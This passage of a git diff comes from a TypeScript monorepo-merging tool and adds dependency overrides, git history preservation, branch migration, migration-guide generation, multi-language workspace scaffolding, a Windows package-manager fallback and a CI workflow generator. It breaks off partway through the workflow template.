logger.info(`Processing ${source.original}...`); - - try { - await cloneOrCopyRepo(source, targetDir, options); - results.push({ path: targetDir, name: source.name }); - logger.success(`Processed ${source.name}`); - } catch (error) { - const message = error instanceof Error ? error.message : String(error); - logger.error(`Failed to process ${source.original}: ${message}`); - throw error; - } - } + const { logger, concurrency = 4 } = options; + + const results = await pMap( + sources, + async (source) => { + const targetDir = path.join(tempDir, source.name); + + logger.info(`Processing ${source.original}...`); + + try { + await cloneOrCopyRepo(source, targetDir, options); + logger.success(`Processed ${source.name}`); + return { path: targetDir, name: source.name }; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + logger.error(`Failed to process ${source.original}: ${message}`); + throw error; + } + }, + concurrency, + ); return results; } diff --git a/src/strategies/dependency-enforcement.ts b/src/strategies/dependency-enforcement.ts new file mode 100755 index 0000000..3e8bec0 --- /dev/null +++ b/src/strategies/dependency-enforcement.ts @@ -0,0 +1,176 @@ +import type { + DependencyConflict, + PackageManagerType, + PlanDecision, + PackageInfo, + VerifyCheck, +} from '../types/index.js'; +import { readJson, pathExists } from '../utils/fs.js'; +import path from 'node:path'; + +/** + * Generate package manager overrides/resolutions from resolved conflict decisions. 
+ */ +export function generateOverrides( + conflicts: DependencyConflict[], + decisions: PlanDecision[], + _pmType: PackageManagerType, +): Record { + const overrides: Record = {}; + + for (const conflict of conflicts) { + // Find the decision for this conflict + const decision = decisions.find((d) => d.id === `dep-${conflict.name}`); + const resolvedVersion = decision?.chosen || conflict.versions[0]?.version; + + if (resolvedVersion) { + overrides[conflict.name] = resolvedVersion; + } + } + + return overrides; +} + +/** + * Get the correct key name for overrides based on package manager. + */ +export function getOverridesKey(pmType: PackageManagerType): string { + switch (pmType) { + case 'pnpm': + return 'pnpm.overrides'; + case 'yarn': + case 'yarn-berry': + return 'resolutions'; + case 'npm': + return 'overrides'; + } +} + +/** + * Normalize internal dependencies to use workspace protocol. + */ +export function normalizeToWorkspaceProtocol( + _rootPkgJson: Record, + packages: PackageInfo[], + workspaceProtocol: string, +): Array<{ packageName: string; dependency: string; from: string; to: string }> { + const updates: Array<{ packageName: string; dependency: string; from: string; to: string }> = []; + const packageNames = new Set(packages.map((p) => p.name)); + + for (const pkg of packages) { + for (const depType of ['dependencies', 'devDependencies'] as const) { + const deps = pkg[depType]; + if (!deps) continue; + + for (const [dep, version] of Object.entries(deps)) { + if (packageNames.has(dep) && !version.startsWith('workspace:')) { + updates.push({ + packageName: pkg.name, + dependency: dep, + from: version, + to: workspaceProtocol, + }); + } + } + } + } + + return updates; +} + +/** + * Apply overrides to root package.json in-place. 
+ */ +export function applyOverridesToPackageJson( + rootPkgJson: Record, + overrides: Record, + pmType: PackageManagerType, +): Record { + const result = { ...rootPkgJson }; + const key = getOverridesKey(pmType); + + if (key === 'pnpm.overrides') { + // Nested under pnpm key + const pnpmConfig = (result.pnpm as Record) || {}; + pnpmConfig.overrides = overrides; + result.pnpm = pnpmConfig; + } else { + result[key] = overrides; + } + + return result; +} + +/** + * Verify that enforcement is properly configured. + */ +export async function verifyEnforcement( + monorepoDir: string, + pmType: PackageManagerType, +): Promise { + const checks: VerifyCheck[] = []; + const rootPkgPath = path.join(monorepoDir, 'package.json'); + + if (!(await pathExists(rootPkgPath))) { + checks.push({ + id: 'enforcement-no-root-pkg', + message: 'No root package.json found', + status: 'fail', + tier: 'static', + }); + return checks; + } + + try { + const rootPkg = (await readJson(rootPkgPath)) as Record; + const key = getOverridesKey(pmType); + + if (key === 'pnpm.overrides') { + const pnpmConfig = rootPkg.pnpm as Record | undefined; + const overrides = pnpmConfig?.overrides as Record | undefined; + if (overrides && Object.keys(overrides).length > 0) { + checks.push({ + id: 'enforcement-overrides-present', + message: `pnpm overrides configured (${Object.keys(overrides).length} entries)`, + status: 'pass', + tier: 'static', + }); + } else { + checks.push({ + id: 'enforcement-overrides-missing', + message: 'No pnpm overrides configured', + status: 'warn', + tier: 'static', + details: 'Consider adding pnpm.overrides to enforce dependency versions', + }); + } + } else { + const overrides = rootPkg[key] as Record | undefined; + if (overrides && Object.keys(overrides).length > 0) { + checks.push({ + id: 'enforcement-overrides-present', + message: `${key} configured (${Object.keys(overrides).length} entries)`, + status: 'pass', + tier: 'static', + }); + } else { + checks.push({ + id: 
'enforcement-overrides-missing', + message: `No ${key} configured`, + status: 'warn', + tier: 'static', + details: `Consider adding ${key} to enforce dependency versions`, + }); + } + } + } catch { + checks.push({ + id: 'enforcement-parse-error', + message: 'Could not parse root package.json', + status: 'fail', + tier: 'static', + }); + } + + return checks; +} diff --git a/src/strategies/history-preserve.ts b/src/strategies/history-preserve.ts index c42f95f..7926fe3 100755 --- a/src/strategies/history-preserve.ts +++ b/src/strategies/history-preserve.ts @@ -10,7 +10,8 @@ export async function checkGitFilterRepo(): Promise { try { execFileSync('git', ['filter-repo', '--version'], { stdio: 'pipe' }); return true; - } catch { + } catch (_err) { + // git filter-repo not installed or not on PATH return false; } } @@ -25,11 +26,20 @@ async function isGitRepo(dir: string): Promise { stdio: 'pipe', }); return true; - } catch { + } catch (_err) { + // Not a git repository return false; } } +/** + * Sanitize a string for safe use in a Python bytes literal. + * Removes any characters that could break out of the string. 
+ */ +function sanitizeForPython(s: string): string { + return s.replace(/[^a-zA-Z0-9 _\-\[\]().,:;!?#@&+=]/g, ''); +} + /** * Preserve git history using git filter-repo * Rewrites paths and optionally prefixes commit messages @@ -46,12 +56,14 @@ async function preserveHistoryWithFilterRepo( await copyDir(repoPath, workingDir); try { - // Rewrite paths to be under targetDir - const filterArgs = ['filter-repo', '--force', `--path-rename`, `:${targetDir}/`]; + // Validate targetDir doesn't contain dangerous characters + const safeTargetDir = targetDir.replace(/[^a-zA-Z0-9_\-./]/g, ''); + const filterArgs = ['filter-repo', '--force', '--path-rename', `:${safeTargetDir}/`]; // Add commit message prefix if specified if (commitPrefix) { - filterArgs.push('--message-callback', `return b"${commitPrefix}" + message`); + const safePrefix = sanitizeForPython(commitPrefix); + filterArgs.push('--message-callback', `return b"${safePrefix}" + message`); } execFileSync('git', filterArgs, { @@ -68,8 +80,8 @@ async function preserveHistoryWithFilterRepo( cwd: outputPath, stdio: 'pipe', }); - } catch { - // Remote doesn't exist, which is fine + } catch (_err) { + // Remote doesn't exist yet, safe to ignore } execFileSync('git', ['remote', 'add', remoteName, workingDir], { @@ -88,15 +100,15 @@ async function preserveHistoryWithFilterRepo( cwd: outputPath, stdio: 'pipe', }); - } catch { - // Try with master branch + } catch (_err) { + // main branch merge failed, try master try { execFileSync('git', ['merge', `${remoteName}/master`, '--allow-unrelated-histories', '--no-edit'], { cwd: outputPath, stdio: 'pipe', }); - } catch { - // Try to find the default branch + } catch (_err) { + // master branch merge also failed, try to find the default branch const branches = execFileSync('git', ['branch', '-r'], { cwd: outputPath, encoding: 'utf-8', @@ -105,6 +117,7 @@ async function preserveHistoryWithFilterRepo( const remoteBranch = branches .split('\n') .map((b) => b.trim()) + .filter((b) => 
!b.includes('->')) .find((b) => b.startsWith(`${remoteName}/`)); if (remoteBranch) { @@ -128,8 +141,8 @@ async function preserveHistoryWithFilterRepo( try { const fs = await import('fs-extra'); await fs.remove(workingDir); - } catch { - // Ignore cleanup errors + } catch (_err) { + // Cleanup of working directory failed; non-fatal } } } @@ -145,17 +158,15 @@ async function preserveHistoryWithSubtree( ): Promise { const { targetDir } = options; - // Ensure the target directory exists - await ensureDir(path.join(outputPath, targetDir)); - // Check if repo has commits try { execFileSync('git', ['rev-parse', 'HEAD'], { cwd: repoPath, stdio: 'pipe', }); - } catch { - // No commits, just copy files + } catch (_err) { + // No commits in repo, just copy files + await ensureDir(path.join(outputPath, targetDir)); await copyDir(repoPath, path.join(outputPath, targetDir)); return; } @@ -169,8 +180,8 @@ async function preserveHistoryWithSubtree( cwd: outputPath, stdio: 'pipe', }); - } catch { - // Remote doesn't exist, which is fine + } catch (_err) { + // Remote doesn't exist yet, safe to ignore } execFileSync('git', ['remote', 'add', remoteName, repoPath], { @@ -196,18 +207,19 @@ async function preserveHistoryWithSubtree( } else if (branches.includes(`${remoteName}/master`)) { defaultBranch = 'master'; } else { - // Find any branch from this remote + // Find any branch from this remote (skip HEAD -> symbolic refs) const remoteBranch = branches .split('\n') .map((b) => b.trim()) + .filter((b) => !b.includes('->')) .find((b) => b.startsWith(`${remoteName}/`)); if (remoteBranch) { defaultBranch = remoteBranch.replace(`${remoteName}/`, ''); } } - } catch { - // Use default + } catch (_err) { + // Could not list remote branches, use default } // Use subtree add to merge with history @@ -262,13 +274,30 @@ export async function preserveHistory( stdio: 'pipe', }); + // Ensure commits can be created in fresh CI environments without global git config. 
+ const commitName = + process.env.GIT_AUTHOR_NAME || process.env.GIT_COMMITTER_NAME || 'monotize'; + const commitEmail = + process.env.GIT_AUTHOR_EMAIL || + process.env.GIT_COMMITTER_EMAIL || + 'monotize@example.com'; + + execFileSync('git', ['config', 'user.name', commitName], { + cwd: outputPath, + stdio: 'pipe', + }); + execFileSync('git', ['config', 'user.email', commitEmail], { + cwd: outputPath, + stdio: 'pipe', + }); + // Create initial commit if needed try { execFileSync('git', ['rev-parse', 'HEAD'], { cwd: outputPath, stdio: 'pipe', }); - } catch { + } catch (_err) { // No commits yet, create an initial commit execFileSync('git', ['commit', '--allow-empty', '-m', 'Initial commit'], { cwd: outputPath, @@ -287,6 +316,81 @@ export async function preserveHistory( } } +/** + * Check all prerequisites for history preservation. + * Returns ok:true if all checks pass, or a list of issues. + */ +export async function checkHistoryPrerequisites( + repoPath: string, +): Promise<{ ok: boolean; issues: string[] }> { + const issues: string[] = []; + + // Check git is available + try { + execFileSync('which', ['git'], { stdio: 'pipe' }); + } catch (_err) { + issues.push('git is not installed or not on PATH'); + } + + // Check source is a git repo + if (!(await isGitRepo(repoPath))) { + issues.push(`${repoPath} is not a git repository`); + return { ok: false, issues }; + } + + // Check for shallow clone + try { + const result = execFileSync('git', ['rev-parse', '--is-shallow-repository'], { + cwd: repoPath, + encoding: 'utf-8', + }); + if (result.trim() === 'true') { + issues.push('Repository is a shallow clone. 
Run `git fetch --unshallow` first.'); + } + } catch (_err) { + // Older git versions don't support --is-shallow-repository, skip + } + + // Check git-filter-repo availability + const hasFilterRepo = await checkGitFilterRepo(); + if (!hasFilterRepo) { + issues.push('git-filter-repo is not installed (will fall back to git subtree)'); + } + + return { ok: issues.length === 0, issues }; +} + +/** + * Generate a dry-run report for history preservation. + * Shows commit count, contributors, and estimated time without making changes. + */ +export async function historyDryRun( + repoPath: string, + _targetDir: string, +): Promise<{ + commitCount: number; + contributors: string[]; + estimatedSeconds: number; + hasFilterRepo: boolean; + strategy: 'filter-repo' | 'subtree'; +}> { + const commitCount = await getCommitCount(repoPath); + const contributors = await getContributors(repoPath); + const hasFilterRepo = await checkGitFilterRepo(); + + // Rough estimate: ~0.5s per commit for filter-repo, ~0.2s for subtree + const secondsPerCommit = hasFilterRepo ? 0.5 : 0.2; + const estimatedSeconds = Math.max(1, Math.ceil(commitCount * secondsPerCommit)); + + return { + commitCount, + contributors, + estimatedSeconds, + hasFilterRepo, + strategy: hasFilterRepo ? 
'filter-repo' : 'subtree', + }; +} + /** * Get the commit count for a repository */ @@ -297,7 +401,8 @@ export async function getCommitCount(repoPath: string): Promise { encoding: 'utf-8', }); return parseInt(result.trim(), 10); - } catch { + } catch (_err) { + // No commits or git error; return 0 return 0; } } @@ -319,7 +424,8 @@ export async function getContributors(repoPath: string): Promise { .filter((line) => line.length > 0) ); return [...contributors].sort(); - } catch { + } catch (_err) { + // No commits or git error; return empty return []; } } diff --git a/src/strategies/migrate-branch.ts b/src/strategies/migrate-branch.ts new file mode 100755 index 0000000..81d7336 --- /dev/null +++ b/src/strategies/migrate-branch.ts @@ -0,0 +1,287 @@ +import path from 'node:path'; +import type { BranchPlan, BranchMigrateStrategy, Logger, PlanOperation } from '../types/index.js'; +import { safeExecFile, commandExists } from '../utils/exec.js'; +import { pathExists } from '../utils/fs.js'; + +/** + * Check prerequisites for branch migration + */ +export async function checkBranchMigratePrerequisites( + sourceRepo: string, + targetMonorepo: string, + strategy: BranchMigrateStrategy, +): Promise<{ ok: boolean; issues: string[] }> { + const issues: string[] = []; + + // Check source repo exists + if (!(await pathExists(sourceRepo))) { + issues.push(`Source repository not found: ${sourceRepo}`); + } + + // Check target monorepo exists + if (!(await pathExists(targetMonorepo))) { + issues.push(`Target monorepo not found: ${targetMonorepo}`); + } + + // Check git is available + const hasGit = await commandExists('git'); + if (!hasGit) { + issues.push('git is not installed or not on PATH'); + } + + // Check for shallow clone + if (await pathExists(sourceRepo)) { + try { + const { stdout } = await safeExecFile('git', ['rev-parse', '--is-shallow-repository'], { + cwd: sourceRepo, + }); + if (stdout.trim() === 'true') { + issues.push('Source repository is a shallow clone. 
Run `git fetch --unshallow` first.'); + } + } catch { + // Not a git repo or other error + issues.push('Source path is not a valid git repository'); + } + } + + // Strategy-specific checks + if (strategy === 'subtree') { + // git subtree is built-in to git, no extra check needed + } else if (strategy === 'replay') { + // git format-patch and git am are built-in + } + + return { ok: issues.length === 0, issues }; +} + +/** + * Get dry-run report for a branch migration + */ +export async function branchMigrateDryRun( + sourceRepo: string, + branch: string, +): Promise<{ commitCount: number; estimatedTime: string; contributors: string[] }> { + try { + // Count commits on the branch + const { stdout: logOutput } = await safeExecFile( + 'git', + ['log', branch, '--oneline', '--no-merges'], + { cwd: sourceRepo }, + ); + const commitCount = logOutput.trim().split('\n').filter(Boolean).length; + + // Get contributors + const { stdout: authorOutput } = await safeExecFile( + 'git', + ['log', branch, '--format=%aN', '--no-merges'], + { cwd: sourceRepo }, + ); + const contributors = [...new Set(authorOutput.trim().split('\n').filter(Boolean))]; + + // Estimate time based on commit count + const secondsPerCommit = 0.5; + const totalSeconds = Math.ceil(commitCount * secondsPerCommit); + const estimatedTime = + totalSeconds < 60 + ? 
`${totalSeconds} seconds`
+        : `${Math.ceil(totalSeconds / 60)} minutes`;
+
+    return { commitCount, estimatedTime, contributors };
+  } catch {
+    return { commitCount: 0, estimatedTime: 'unknown', contributors: [] };
+  }
+}
+
+/**
+ * Generate a BranchPlan for migrating a branch
+ */
+export async function generateBranchPlan(
+  branch: string,
+  sourceRepo: string,
+  targetMonorepo: string,
+  strategy: BranchMigrateStrategy,
+  logger: Logger,
+): Promise<BranchPlan> {
+  const srcPath = path.resolve(sourceRepo);
+  const targetPath = path.resolve(targetMonorepo);
+
+  // Check prerequisites
+  const prereqs = await checkBranchMigratePrerequisites(srcPath, targetPath, strategy);
+  if (!prereqs.ok) {
+    throw new Error(`Prerequisites not met:\n${prereqs.issues.map((i) => `  - ${i}`).join('\n')}`);
+  }
+
+  logger.info(`Generating branch migration plan: ${branch} (${strategy} strategy)`);
+
+  // Get dry-run report
+  const dryRunReport = await branchMigrateDryRun(srcPath, branch);
+  logger.info(`Found ${dryRunReport.commitCount} commits from ${dryRunReport.contributors.length} contributors`);
+
+  // Generate operations based on strategy
+  const operations: PlanOperation[] = [];
+
+  if (strategy === 'subtree') {
+    operations.push(
+      {
+        id: 'add-remote',
+        type: 'exec',
+        description: `Add source repo as remote`,
+        inputs: [srcPath],
+        outputs: [],
+      },
+      {
+        id: 'subtree-add',
+        type: 'exec',
+        description: `Import branch ${branch} via git subtree add`,
+        inputs: [branch],
+        outputs: [],
+      },
+      {
+        id: 'remove-remote',
+        type: 'exec',
+        description: 'Remove temporary remote',
+        inputs: [],
+        outputs: [],
+      },
+    );
+  } else {
+    // replay strategy
+    operations.push(
+      {
+        id: 'format-patch',
+        type: 'exec',
+        description: `Export ${dryRunReport.commitCount} commits as patches`,
+        inputs: [srcPath, branch],
+        outputs: ['patches/'],
+      },
+      {
+        id: 'create-branch',
+        type: 'exec',
+        description: `Create branch ${branch} in target`,
+        inputs: [],
+        outputs: [branch],
+      },
+      {
+        id: 'apply-patches',
+        type: 'exec',
+        description: 'Replay patches via git am',
+        inputs: ['patches/'],
+        outputs: [],
+      },
+    );
+  }
+
+  return {
+    schemaVersion: 1,
+    createdAt: new Date().toISOString(),
+    branch,
+    sourceRepo: srcPath,
+    targetMonorepo: targetPath,
+    strategy,
+    operations,
+    dryRunReport,
+  };
+}
+
+/**
+ * Apply a BranchPlan using subtree strategy
+ */
+async function applySubtreeImport(
+  plan: BranchPlan,
+  subdir: string,
+  logger: Logger,
+): Promise<void> {
+  const { sourceRepo, branch, targetMonorepo } = plan;
+  const remoteName = `monotize-import-${Date.now()}`;
+
+  try {
+    // Add remote
+    logger.info(`Adding remote ${remoteName}...`);
+    await safeExecFile('git', ['remote', 'add', remoteName, sourceRepo], {
+      cwd: targetMonorepo,
+    });
+
+    // Fetch
+    logger.info(`Fetching ${branch}...`);
+    await safeExecFile('git', ['fetch', remoteName, branch], {
+      cwd: targetMonorepo,
+    });
+
+    // Subtree add
+    logger.info(`Importing via subtree add to ${subdir}...`);
+    await safeExecFile(
+      'git',
+      ['subtree', 'add', `--prefix=${subdir}`, `${remoteName}/${branch}`, '--squash'],
+      { cwd: targetMonorepo },
+    );
+
+    logger.success(`Branch ${branch} imported to ${subdir}`);
+  } finally {
+    // Cleanup remote
+    try {
+      await safeExecFile('git', ['remote', 'remove', remoteName], {
+        cwd: targetMonorepo,
+      });
+    } catch {
+      // Ignore cleanup errors
+    }
+  }
+}
+
+/**
+ * Apply a BranchPlan using patch replay strategy
+ */
+async function applyPatchReplay(
+  plan: BranchPlan,
+  subdir: string,
+  logger: Logger,
+): Promise<void> {
+  const { sourceRepo, branch, targetMonorepo } = plan;
+
+  // Export patches
+  logger.info(`Exporting patches from ${branch}...`);
+  const patchDir = path.join(targetMonorepo, '.monotize', 'patches', branch);
+  const { ensureDir } = await import('../utils/fs.js');
+  await ensureDir(patchDir);
+
+  await safeExecFile(
+    'git',
+    ['format-patch', `main..${branch}`, '-o', patchDir],
+    { cwd: sourceRepo },
+  );
+
+  // Create branch in target
+  logger.info(`Creating branch ${branch} in target...`);
+  await safeExecFile('git', ['checkout', '-b', branch], {
+    cwd: targetMonorepo,
+  });
+
+  // Apply patches
+  logger.info('Replaying patches...');
+  try {
+    await safeExecFile(
+      'git',
+      ['am', '--directory', subdir, `${patchDir}/*.patch`],
+      { cwd: targetMonorepo },
+    );
+    logger.success(`Branch ${branch} replayed to ${subdir}`);
+  } catch (err: unknown) {
+    logger.warn('Patch replay may have conflicts. Check with `git am --show-current-patch`');
+    throw err;
+  }
+}
+
+/**
+ * Apply a BranchPlan
+ */
+export async function applyBranchPlan(
+  plan: BranchPlan,
+  subdir: string,
+  logger: Logger,
+): Promise<void> {
+  if (plan.strategy === 'subtree') {
+    await applySubtreeImport(plan, subdir, logger);
+  } else {
+    await applyPatchReplay(plan, subdir, logger);
+  }
+}
diff --git a/src/strategies/migration-doc.ts b/src/strategies/migration-doc.ts
new file mode 100755
index 0000000..0916ba4
--- /dev/null
+++ b/src/strategies/migration-doc.ts
@@ -0,0 +1,134 @@
+import type { ExtendedAnalysis, AnalyzeResult, RiskSummary } from '../types/index.js';
+
+/**
+ * Generate a MIGRATION.md document from analysis results.
+ */ +export function generateMigrationDoc( + analysis: AnalyzeResult, + extended?: ExtendedAnalysis, +): string { + const lines: string[] = []; + + lines.push('# Migration Guide'); + lines.push(''); + lines.push(`> Generated by Monotize on ${new Date().toISOString()}`); + lines.push(''); + + // Risk Summary + if (extended?.riskSummary) { + lines.push('## Risk Assessment'); + lines.push(''); + lines.push(`**Classification:** ${formatClassification(extended.riskSummary)}`); + lines.push(''); + if (extended.riskSummary.reasons.length > 0) { + lines.push('**Reasons:**'); + for (const reason of extended.riskSummary.reasons) { + lines.push(`- ${reason}`); + } + lines.push(''); + } + } + + // Top Risks + if (extended?.riskSummary?.topFindings?.length) { + lines.push('## Top Risks'); + lines.push(''); + for (const finding of extended.riskSummary.topFindings) { + lines.push(`### ${finding.title}`); + lines.push(''); + lines.push(`- **Severity:** ${finding.severity}`); + lines.push(`- **Action:** ${finding.suggestedAction}`); + if (finding.evidence.length > 0) { + lines.push(`- **Evidence:**`); + for (const e of finding.evidence.slice(0, 3)) { + lines.push(` - ${e.path}${e.snippet ? 
`: ${e.snippet}` : ''}`); + } + } + lines.push(''); + } + } + + // Complexity + lines.push('## Complexity'); + lines.push(''); + lines.push(`- **Score:** ${analysis.complexityScore}/100`); + lines.push(`- **Packages:** ${analysis.packages.length}`); + lines.push(`- **Conflicts:** ${analysis.conflicts.length}`); + lines.push(`- **File Collisions:** ${analysis.collisions.length}`); + if (analysis.circularDependencies?.length) { + lines.push(`- **Circular Dependencies:** ${analysis.circularDependencies.length}`); + } + lines.push(''); + + // Required Decisions + if (analysis.findings?.decisions?.length) { + lines.push('## Required Decisions'); + lines.push(''); + for (const decision of analysis.findings.decisions) { + lines.push(`- [ ] **${decision.kind}**: ${decision.description}`); + if (decision.suggestedAction) { + lines.push(` - Suggested: ${decision.suggestedAction}`); + } + } + lines.push(''); + } + + // Suggested Order of Operations + lines.push('## Suggested Order of Operations'); + lines.push(''); + lines.push('1. **Prepare** - Standardize Node.js versions, package managers, and build scripts'); + lines.push('2. **Plan** - Generate and review the migration plan'); + lines.push('3. **Merge** - Execute the migration'); + lines.push('4. **Configure** - Set up shared tooling (TypeScript, ESLint, Prettier)'); + lines.push('5. **Verify** - Run verification checks'); + lines.push('6. 
**Archive** - Deprecate source repositories'); + lines.push(''); + + // Extended sections + if (extended) { + const sections: Array<{ title: string; findings: typeof extended.environment }> = [ + { title: 'Environment', findings: extended.environment }, + { title: 'Package Manager', findings: extended.packageManager }, + { title: 'Tooling', findings: extended.tooling }, + { title: 'CI/CD', findings: extended.ci }, + { title: 'Publishing', findings: extended.publishing }, + { title: 'Repository Risks', findings: extended.repoRisks }, + ]; + + for (const section of sections) { + if (section.findings.length === 0) continue; + lines.push(`## ${section.title}`); + lines.push(''); + for (const f of section.findings) { + const icon = f.severity === 'critical' || f.severity === 'error' ? '!!' : + f.severity === 'warn' ? '!' : 'i'; + lines.push(`- [${icon}] ${f.title}`); + lines.push(` - ${f.suggestedAction}`); + } + lines.push(''); + } + } + + // Recommendations + if (analysis.recommendations.length > 0) { + lines.push('## Recommendations'); + lines.push(''); + for (const rec of analysis.recommendations) { + lines.push(`- ${rec}`); + } + lines.push(''); + } + + return lines.join('\n'); +} + +function formatClassification(summary: RiskSummary): string { + switch (summary.classification) { + case 'straightforward': + return 'Straightforward - Migration should be smooth'; + case 'needs-decisions': + return 'Needs Decisions - Some items require human judgment'; + case 'complex': + return 'Complex - Significant manual work required'; + } +} diff --git a/src/strategies/multilang-scaffold.ts b/src/strategies/multilang-scaffold.ts new file mode 100755 index 0000000..6ef2c19 --- /dev/null +++ b/src/strategies/multilang-scaffold.ts @@ -0,0 +1,78 @@ +import type { PlanFile, LanguageDetection, AnalysisFinding } from '../types/index.js'; + +/** + * Extract languages of a specific type from detections. 
+ */
+function filterByLanguage(
+  detections: LanguageDetection[],
+  lang: 'go' | 'rust' | 'python',
+): Array<{ repoName: string; markers: string[]; metadata?: Record<string, unknown> }> {
+  const results: Array<{ repoName: string; markers: string[]; metadata?: Record<string, unknown> }> = [];
+  for (const detection of detections) {
+    for (const language of detection.languages) {
+      if (language.name === lang) {
+        results.push({
+          repoName: detection.repoName,
+          markers: language.markers,
+          metadata: language.metadata,
+        });
+      }
+    }
+  }
+  return results;
+}
+
+/**
+ * Generate go.work for Go modules.
+ */
+export function scaffoldGoWorkspace(
+  detections: LanguageDetection[],
+  packagesDir: string,
+): PlanFile {
+  const goModules = filterByLanguage(detections, 'go');
+  const useDirectives = goModules
+    .map((m) => `\t./${packagesDir}/${m.repoName}`)
+    .join('\n');
+
+  return {
+    relativePath: 'go.work',
+    content: `go 1.21\n\nuse (\n${useDirectives}\n)\n`,
+  };
+}
+
+/**
+ * Generate workspace Cargo.toml for Rust crates.
+ */
+export function scaffoldRustWorkspace(
+  detections: LanguageDetection[],
+  packagesDir: string,
+): PlanFile {
+  const crates = filterByLanguage(detections, 'rust');
+  const members = crates
+    .map((c) => `  "${packagesDir}/${c.repoName}"`)
+    .join(',\n');
+
+  return {
+    relativePath: 'Cargo.toml',
+    content: `[workspace]\nmembers = [\n${members}\n]\n`,
+  };
+}
+
+/**
+ * Generate recommendations for Python projects (no standard workspace protocol).
+ */
+export function generatePythonRecommendations(
+  detections: LanguageDetection[],
+): AnalysisFinding[] {
+  const pyProjects = filterByLanguage(detections, 'python');
+  return pyProjects.map((p) => ({
+    id: `python-workspace-${p.repoName}`,
+    title: `Python project detected in ${p.repoName}`,
+    severity: 'info' as const,
+    confidence: 'high' as const,
+    evidence: [{ path: p.markers[0] }],
+    suggestedAction: p.markers[0] === 'pyproject.toml'
+      ? 
'Consider using uv workspaces or poetry for Python monorepo management' + : 'Consider migrating from requirements.txt to pyproject.toml for better monorepo support', + })); +} diff --git a/src/strategies/package-manager.ts b/src/strategies/package-manager.ts index 6aa62c5..393c861 100755 --- a/src/strategies/package-manager.ts +++ b/src/strategies/package-manager.ts @@ -3,13 +3,46 @@ import path from 'node:path'; import type { PackageManagerType, PackageManagerConfig } from '../types/index.js'; import { pathExists } from '../utils/fs.js'; +function quoteForCmd(arg: string): string { + if (!/[\s"]/u.test(arg)) return arg; + return `"${arg.replace(/"/g, '""')}"`; +} + +function execPackageManager( + command: string, + args: string[], + options: { encoding: 'utf-8' } | { stdio: 'pipe' }, +): string { + if (process.platform !== 'win32') { + return execFileSync(command, args, options).toString(); + } + + const commandLine = [command, ...args].map(quoteForCmd).join(' '); + const attempts: Array<{ cmd: string; args: string[] }> = [ + { cmd: command, args }, + { cmd: `${command}.cmd`, args }, + { cmd: 'cmd.exe', args: ['/d', '/s', '/c', commandLine] }, + ]; + + let lastError: unknown; + for (const attempt of attempts) { + try { + return execFileSync(attempt.cmd, attempt.args, options).toString(); + } catch (error) { + lastError = error; + } + } + + throw lastError; +} + /** * Get the installed version of a package manager */ export function getPackageManagerVersion(pm: PackageManagerType): string { const command = pm === 'yarn-berry' ? 
'yarn' : pm; try { - const version = execFileSync(command, ['--version'], { encoding: 'utf-8' }).trim(); + const version = execPackageManager(command, ['--version'], { encoding: 'utf-8' }).trim(); return version; } catch { // Default fallback versions @@ -32,7 +65,7 @@ export function getPackageManagerVersion(pm: PackageManagerType): string { export function isPackageManagerInstalled(pm: PackageManagerType): boolean { const command = pm === 'yarn-berry' ? 'yarn' : pm; try { - execFileSync(command, ['--version'], { stdio: 'pipe' }); + execPackageManager(command, ['--version'], { stdio: 'pipe' }); return true; } catch { return false; @@ -75,7 +108,7 @@ export async function isYarnBerry(dirPath?: string): Promise { // Check yarn version try { - const version = execFileSync('yarn', ['--version'], { encoding: 'utf-8' }).trim(); + const version = execPackageManager('yarn', ['--version'], { encoding: 'utf-8' }).trim(); const majorVersion = parseInt(version.split('.')[0], 10); return majorVersion >= 2; } catch { @@ -269,6 +302,13 @@ export function getPackageManagerField(pm: PackageManagerConfig): string { * Parse package manager type from CLI input */ export function parsePackageManagerType(input: string): PackageManagerType { + return tryParsePackageManagerType(input) ?? 'pnpm'; +} + +/** + * Parse package manager type from CLI input, returning null for invalid values. 
+ */ +export function tryParsePackageManagerType(input: string): PackageManagerType | null { const normalized = input.toLowerCase().trim(); switch (normalized) { @@ -284,7 +324,7 @@ export function parsePackageManagerType(input: string): PackageManagerType { case 'npm': return 'npm'; default: - return 'pnpm'; // Default to pnpm + return null; } } diff --git a/src/strategies/workflow-generator.ts b/src/strategies/workflow-generator.ts new file mode 100755 index 0000000..48f712c --- /dev/null +++ b/src/strategies/workflow-generator.ts @@ -0,0 +1,117 @@ +import type { PlanFile } from '../types/index.js'; + +export interface WorkflowGeneratorOptions { + /** Package manager command (e.g. 'pnpm', 'yarn', 'npm') */ + packageManager?: string; + /** Default verify tier for CI */ + verifyTier?: 'static' | 'install' | 'full'; + /** Node.js version for CI */ + nodeVersion?: string; +} + +/** + * Generate a path-filtered GitHub Actions workflow for a monorepo. + * Each package gets its own path filter so only affected packages are tested. + */ +export function generatePathFilteredWorkflow( + packageNames: string[], + packagesDir: string, + options: WorkflowGeneratorOptions = {}, +): PlanFile { + const pm = options.packageManager || 'pnpm'; + const nodeVersion = options.nodeVersion || '20'; + const installCmd = pm === 'npm' ? 'npm ci' : pm === 'yarn' ? 'yarn install --frozen-lockfile' : 'pnpm install --frozen-lockfile'; + const pmSetup = pm === 'pnpm' ? 
` + - name: Setup pnpm + uses: pnpm/action-setup@v4 + with: + version: 9` : ''; + + // Build path filters for each package + const pathFilters = packageNames + .map((pkg) => ` ${pkg}:\n - '${packagesDir}/${pkg}/**'`) + .join('\n'); + + // Build matrix entries + const matrixIncludes = packageNames + .map((pkg) => ` - package: ${pkg}`) + .join('\n'); + + const content = `# Generated by Monotize - path-filtered CI workflow +name: CI + +on: + push: + branches: [main, master] + paths: +${packageNames.map((pkg) => ` - '${packagesDir}/${pkg}/**'`).join('\n')} + - 'package.json' + - 'pnpm-lock.yaml' + - '.github/workflows/monotize-ci.yml' + pull_request: + branches: [main, master] + paths: +${packageNames.map((pkg) => ` - '${packagesDir}/${pkg}/**'`).join('\n')} + - 'package.json' + - 'pnpm-lock.yaml' + - '.github/workflows/monotize-ci.yml' + +jobs: + detect-changes: + runs-on: ubuntu-latest + outputs: +${packageNames.map((pkg) => ` ${pkg}: \${{ steps.filter.outputs.${pkg} }}`).join('\n')} + steps: + - uses: actions/checkout@v4 + - uses: dorny/paths-filter@v3 + id: filter + with: + filters: | +${pathFilters} + + build-test: + needs: detect-changes + runs-on: ubuntu-latest + strategy: + fail-fast: false + matrix: + include: +${matrixIncludes} + if: >- +${packageNames.map((pkg) => ` needs.detect-changes.outputs.${pkg} == 'true'`).join(' ||\n')} + steps: + - uses: actions/checkout@v4 + - uses: actions/setup-node@v4 + with: + node-version: 